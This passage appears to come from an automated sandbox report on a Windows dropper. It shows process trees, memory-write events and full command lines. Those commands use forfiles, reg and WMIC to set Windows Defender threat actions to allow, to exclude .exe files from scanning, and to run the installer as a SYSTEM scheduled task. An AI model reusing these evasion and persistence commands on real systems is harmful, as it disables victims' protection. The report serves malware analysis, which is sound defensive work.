Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2004 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe C:\Users\Admin\AppData\Local\Temp\7zS4A38.tmp\Install.exe
PID 2004 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe C:\Users\Admin\AppData\Local\Temp\7zS4A38.tmp\Install.exe
PID 2004 wrote to memory of 4048 N/A C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe C:\Users\Admin\AppData\Local\Temp\7zS4A38.tmp\Install.exe
PID 4048 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A38.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe
PID 4048 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A38.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe
PID 4048 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\7zS4A38.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe
PID 2072 wrote to memory of 3244 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2072 wrote to memory of 3244 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2072 wrote to memory of 3244 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 3244 wrote to memory of 4944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3244 wrote to memory of 4944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3244 wrote to memory of 4944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4944 wrote to memory of 4032 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4944 wrote to memory of 4032 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4944 wrote to memory of 4032 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4032 wrote to memory of 1244 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4032 wrote to memory of 1244 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4032 wrote to memory of 1244 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3244 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3244 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3244 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 1764 wrote to memory of 2184 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1764 wrote to memory of 2184 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1764 wrote to memory of 2184 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2184 wrote to memory of 3180 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2184 wrote to memory of 3180 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2184 wrote to memory of 3180 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3244 wrote to memory of 4612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3244 wrote to memory of 4612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3244 wrote to memory of 4612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4612 wrote to memory of 3756 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4612 wrote to memory of 3756 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4612 wrote to memory of 3756 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3756 wrote to memory of 3504 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3756 wrote to memory of 3504 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3756 wrote to memory of 3504 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3244 wrote to memory of 4908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3244 wrote to memory of 4908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3244 wrote to memory of 4908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4908 wrote to memory of 116 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 116 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4908 wrote to memory of 116 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 116 wrote to memory of 1968 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 116 wrote to memory of 1968 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 116 wrote to memory of 1968 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3244 wrote to memory of 2356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3244 wrote to memory of 2356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3244 wrote to memory of 2356 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2356 wrote to memory of 3760 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2356 wrote to memory of 3760 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2356 wrote to memory of 3760 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3760 wrote to memory of 3164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3760 wrote to memory of 3164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3760 wrote to memory of 3164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3164 wrote to memory of 2592 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\gpupdate.exe
PID 3164 wrote to memory of 2592 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\gpupdate.exe
PID 3164 wrote to memory of 2592 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\gpupdate.exe
PID 2072 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2072 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2072 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4476 wrote to memory of 4976 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4476 wrote to memory of 4976 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4476 wrote to memory of 4976 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4976 wrote to memory of 1592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe

"C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe"

C:\Users\Admin\AppData\Local\Temp\7zS4A38.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe

.\Install.exe /KZqjdidXaW "385121" /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 01:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe\" PP /DIZdidXcSI 385121 /S" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn btZaCbGShXZoJDfvCg

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn btZaCbGShXZoJDfvCg

C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS4CC8.tmp\Install.exe PP /DIZdidXcSI 385121 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

